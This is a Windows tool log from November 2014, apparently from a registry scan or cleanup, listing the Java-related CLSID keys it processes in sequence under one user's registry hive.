[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0007-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0007-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0008-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0008-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0009-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0009-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0010-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0010-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0011-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0011-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0012-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0012-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0013-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0013-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0014-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0014-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0015-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0015-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0016-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0016-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0017-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0017-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0018-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0018-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0019-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0019-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0020-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0020-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0021-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0021-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0022-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0022-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0023-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0023-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0024-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0024-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0025-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0025-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0026-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0026-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0027-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0027-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0028-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0028-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0029-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0029-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0030-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0030-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0031-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0031-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0032-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0032-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0033-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0033-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0034-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0034-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0035-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0035-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0036-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0036-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0037-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0037-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0038-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0038-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0039-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0039-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0040-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0040-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0041-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0041-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0042-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0042-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0043-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0043-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-FFFF-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0000-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0000-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0000-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0001-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0001-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0001-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0002-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0002-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0002-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0003-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0003-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0003-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0004-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0004-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0004-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0005-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0005-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0005-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0006-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0006-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0006-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0007-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0007-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0007-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0008-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0008-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0008-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0009-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0009-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0009-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0010-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0010-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0010-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0011-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0011-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0011-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0012-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0012-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0012-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0013-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0013-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0013-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0014-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0014-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0014-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0015-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0015-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0015-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0016-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0016-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0016-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0017-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0017-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0017-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0018-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0018-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0018-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0019-ABCDEFFEDCBA}]
